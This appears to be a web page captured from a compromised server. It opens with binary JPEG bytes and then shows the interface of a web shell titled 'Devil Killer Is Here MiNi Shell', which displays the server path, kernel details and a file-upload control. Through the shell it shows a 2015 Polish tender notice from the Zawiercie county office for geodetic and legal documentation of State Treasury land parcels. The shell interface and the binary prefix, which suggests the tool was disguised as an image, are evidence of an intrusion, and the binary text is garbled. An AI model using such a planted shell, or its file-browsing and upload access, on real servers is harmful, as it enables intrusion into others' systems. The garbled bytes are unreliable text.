JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150729/191822-N-2015.html

<p class="kh_header"><b>Zawiercie: Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa -7 zadań</b><br>
<b>Numer ogłoszenia: 191822 - 2015; data zamieszczenia: 29.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starosta Zawierciański , ul. Sienkiewicza 34, 42-400 Zawiercie, woj. śląskie, tel. 32 67 107 10 do 12 wew. 551, faks 32 67 219 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.powiat.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa -7 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 7 zadań. Zamawiający dopuszcza składanie ofert częściowych na poszczególne zadania. 

Przedmiotem zamówienia jest wykonanie n/w prac geodezyjnych podzielonych na 7 zadań: 

Zadanie 1. 
Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia  do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Łazy, oznaczonych jako działki  o numerach:  8175 k. m 14, o pow. 1,4500 ha  i 8540 k. m. 18, o pow. 15,4829 ha   - obręb Grabowa (numery działek po scaleniu), 13/2  o pow. 0,0550 ha, 34 o pow. 0,0628 ha, 50/2 o pow. 0,0061 ha, 122/2 o pow. 0,0023 ha - k. m. 1 ,obręb Kazimierówka, 421 k. m. 7, o pow. 0,0590 ha, 422 k. m. 7, o pow. 0,0289 ha, 766 k. m. 11,o pow. 0,0607 ha, 3502/1 k. m. 20 o pow. 0,0094 ha - obręb Łazy Miasto, 269/2 k. m. 1, o pow. 0,0161 ha - obręb Kuźnica Masłońska - o pow. łącznej ok. 17,2332 ha (11 działek).  

Zadanie nr 2
Przygotowanie dokumentacji geodezyjno-prawnej  z pomiarem i stabilizacją granic do złożenia ewidencji gruntów i budynków oraz regulacji stanu prawnego w drodze zasiedzenia nieruchomości Skarbu Państwa  położonych w gminie Irządze, oznaczonych jako działki o numerach: 69/12,70/8,71/7, 73/8 obręb Zawada Pilicka, o pow. łącznej ok. 1,6 ha (4 działki). 

Zadanie nr 3
Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia  do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Zawiercie, oznaczonych jako działki o numerach:  4268/6  o pow. 0,0126 ha i 4268/8 o pow. 0,0102 ha,  k. m. 20 (obręb Tereny przyłączone z Kromołowa), 3807/1 k. m. 17 o pow. 0,4580 ha (obręb Kromołów), 4331 k. m. 23 o pow.0,8400 ha (obręb Kromołów), 65/1 k. m. 61, o pow. 0,0973 ha (obręb Zawiercie), 62/1 k. m. 55 o pow. 0,7079 ha (obręb Zawiercie), 106 o pow. 0,9167 ha, k. m. 60 (obręb Zawiercie), 59/1 o pow. 0,6716 ha i 59/2 o pow. 0,4739 ha    k. m. 61 (obręb Zawiercie), 62 k. m. 61 o pow. 0,9746 ha (obręb Zawiercie), 65/1 k. m. 61 o pow. 0,1269 ha, 228 k. m. 62 o pow. 1,4887 ha (obręb Zawiercie),101 k .m. 13   o pow. 1,8152 ha (obręb Zawiercie), 9 k. m. 63 o pow.0,6479 ha (obręb Zawiercie), 58 k. m. 66 o pow. 1,9850 ha ( obręb Zawiercie), 37 k. m. 67 o pow. 1,0960 ha (obręb Zawiercie),11 k. m. 68 o pow. 0,8679 ha (obręb Zawiercie), 15 k. m. 71 o pow. 1,0846 ha (obręb Zawiercie), 19 k. m. 69 o pow. 1,7365 ha (obręb Zawiercie), 67/1 k. m. 16 o pow. 0,0156 ha (obręb Zawiercie) , 166/6 k. m. 20 o pow. 0,0015 ha (obręb Zawiercie), 169/1 k. m. 20 o pow. 0,0051 ha (obręb Zawiercie), 39/7 k. m. 40 o pow. 0,0826 ha (obręb Zawiercie), 26/1 k. m. 59 o pow.0,0132 ha (obręb Zawiercie) - pow. łączna ok. 16,1295 ha (24 działki).

Zadanie nr 4
Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia              (z wydzieleniem dróg  publicznych dz. nr: 18, 167,16,4332) do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Zawiercie, oznaczonych jako działki  o numerach:  18 k. m. 15 o pow. 5,3652 ha (obręb Zawiercie ), 167 k. m. 31 o pow. 2,5361 ha (obręb Zawiercie), 90 k. m. 6 o pow. 3,0473 ha (obręb Zawiercie), 16 k. m. 71 o pow. 7,6975 ha (obręb Zawiercie), 4332 k. m. 22 o pow. 7,6550 (obręb Kromołów), 1811 k. m. 9 o pow. 2,1805 ha (obręb Marciszów), 70/5 k. m. 59 o pow. 2,5473 ha (obręb Zawiercie) - pow. łączna ok.  31,0289 ha (7 działek). 

Zadanie nr 5
Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia              do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Kroczyce, oznaczonych jako działki  o numerach:  411/1 k. m. 4 o pow. 0,0304 ha (obręb Biała Błotna), 413/1 k. m. 4 o pow. 0,2550 ha (obręb Biała Błotna), 416/4 k. m. 4 o pow. 0,0156 ha (obręb Biała Błotna), 416/2 k. m. 4 o pow. 0,4699 ha (obręb Biała Błotna), 617/4 k. m. 5 o pow. 0,0243 ha (obręb Biała Błotna), 606/20 k. m. 6 o pow. 0,1092 ha (obręb Biała Błotna), 606/21 k. m. 6 o pow. 0,6703 ha (obręb Biała Błotna), 609/1 k. m. 6 o pow. 0,7983 ha (obręb Biała Błotna), 611/1 k. m. 6 o pow. 0,1633 ha (obręb Biała Błotna), 918/2 k. m. 8 o pow. 0,0338 ha (obręb Dzibice -  z wydzieleniem drogi),1/2 k. m. 1 o pow. 0,0131 ha (obręb Kroczyce Okupne), 21/2 k. m. 1 o pow. 0,0187 ha (obręb Kroczyce Okupne), 39/2 k. m. 1 o pow. 0,0049 ha(obręb Kroczyce Okupne), 55/2 k. m. 1  o pow. 0,0187 ha(obręb Kroczyce Okupne),639/1 k. m. 6 o pow.0,0379 ha(obręb Kroczyce Okupne),645/2 k. m. 6  o pow. 0,5829 ha (obręb Kroczyce Okupne),645/6 k. m. 6 o pow. 0,0543 ha (obręb Kroczyce Okupne), 463/2 k. m. 6 opow. 0,0532 ha (obręb Kroczyce Okupne), 633/1 k. m.6 o pow. 0,0237 ha(obręb Kroczyce Okupne), 1031/5 k. m. 8 o pow. 0,0320 ha (obręb Dzibice)  - pow. łączna ok.  3,4536  ha (20 działek). 

Zadanie nr 6
Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa - działek numer: 1029/1/2,1029/3/2 i 1029/4/2 (stara numeracja zgodnie z KW) k. m. 8 o łącznej pow. ok. 2,7177 ha, (obręb  Dzibice), poprzez doprowadzenie do zgodności stanu ewidencji gruntów i budynków ze stanem ujawnionym w księdze wieczystej numer CZ1M/00004791/1.

Zadanie nr 7
Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia              (z wydzieleniem dróg publicznych dz. nr 643 ) do  regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Ogrodzieniec, oznaczonych jako działki  o numerach: 643 k. m. 5 o pow. 2.2850 ha, 789 k. m. 6 o pow. 1,0454 ha i 901/2 k. m. 6 o pow. 8,7653 ha (obręb Fugasówka) - pow. łączna 12,0957  ha (3 działki).


Szczegółowy opis przedmiotu zamówienia oraz zakres prac określają warunki techniczne, stanowiące załącznik nr 6 do SIWZ.

Wykonawca zobowiązany jest do udzielenia 24 miesięcznego okresu gwarancji jakości   i rękojmi za wady, licząc od dnia odbioru końcowego prac..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału  w postępowaniu (Załącznik nr 2 do SIWZ) tj. oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena przedstawionego warunku dokonana zostanie wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału  w postępowaniu (Załącznik nr 2 do SIWZ) tj. oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena przedstawionego warunku dokonana zostanie wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału    w postępowaniu (Załącznik nr 2 do SIWZ) tj. oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena przedstawionego warunku dokonana zostanie wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności   
odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 5 do SIWZ) z uwzględnieniem warunku szczegółowego tj. Warunek ten  zostanie uznany za spełniony, jeśli wykonawca wykaże, iż  dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie określonym w art.43 pkt 2 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne  (tj. Dz.U. z 2015r. poz. 520) tj. uprawnienia w zakresie rozgraniczania i podziałów nieruchomości (gruntów) oraz sporządzenie dokumentacji do celów prawnych lub której uprawnienia zostały uznane zgodnie z przepisami ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. Nr 63, poz. 394), bądź na podstawie innych właściwych przepisów 
2. Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  (Załącznik nr 5 do SIWZ).
Ocena przedstawionego warunku dokonana zostanie wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału           w postępowaniu (Załącznik nr 2 do SIWZ) tj. oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena przedstawionego warunku dokonana zostanie wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz oferty (wg wzoru stanowiącego Załącznik Nr 1 do SIWZ )
2)	pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika             z innych dokumentów złożonych wraz z ofertą - treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest powołany
3)	pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i podpisania umowy.
4)	pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia (o ile dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień niniejszej umowy mogą nastąpić za zgodą obu stron, wyrażoną na piśmie pod rygorem nieważności w przypadku wystąpienia okoliczności niemożliwych do przewidzenia w dacie zawarcia umowy, w szczególności:
1)	przekształcenia podmiotowego WYKONAWCY
2)	zmiany członków personelu kluczowego WYKONAWCY na skutek wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja  odejście            z pracy lub innych uniemożliwiających należyte wykonanie obowiązków zgodnie          z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez ZAMAWIAJĄCEGO na etapie wyboru oferty w postępowaniu przetargowym.
3)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu zamówienia
4)	wynikają rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony
5)	zmiana osób upoważnionych do kontaktów w związku z realizacją zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Zawierciu
Samodzielny Referat Zamówień Publicznych (p.309)
ul. Sienkiewicza 34 
42-400 Zawiercie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2015 godzina 11:00, miejsce: Starostwo Powiatowe w Zawierciu
Samodzielny Referat Zamówień Publicznych (p.309)
ul. Sienkiewicza 34 
42-400 Zawiercie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia  do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Łazy, oznaczonych jako działki  o numerach:  8175 k. m 14, o pow. 1,4500 ha  i 8540 k. m. 18, o pow. 15,4829 ha   - obręb Grabowa (numery działek po scaleniu), 13/2  o pow. 0,0550 ha, 34 o pow. 0,0628 ha, 50/2 o pow. 0,0061 ha, 122/2 o pow. 0,0023 ha - k. m. 1 ,obręb Kazimierówka, 421 k. m. 7, o pow. 0,0590 ha, 422 k. m. 7, o pow. 0,0289 ha, 766 k. m. 11,o pow. 0,0607 ha, 3502/1 k. m. 20 o pow. 0,0094 ha - obręb Łazy Miasto, 269/2 k. m. 1, o pow. 0,0161 ha - obręb Kuźnica Masłońska - o pow. łącznej ok. 17,2332 ha (11 działek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej  z pomiarem i stabilizacją granic do złożenia ewidencji gruntów i budynków oraz regulacji stanu prawnego w drodze zasiedzenia nieruchomości Skarbu Państwa  położonych w gminie Irządze, oznaczonych jako działki o numerach: 69/12,70/8,71/7, 73/8 obręb Zawada Pilicka, o pow. łącznej ok. 1,6 ha (4 działki)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
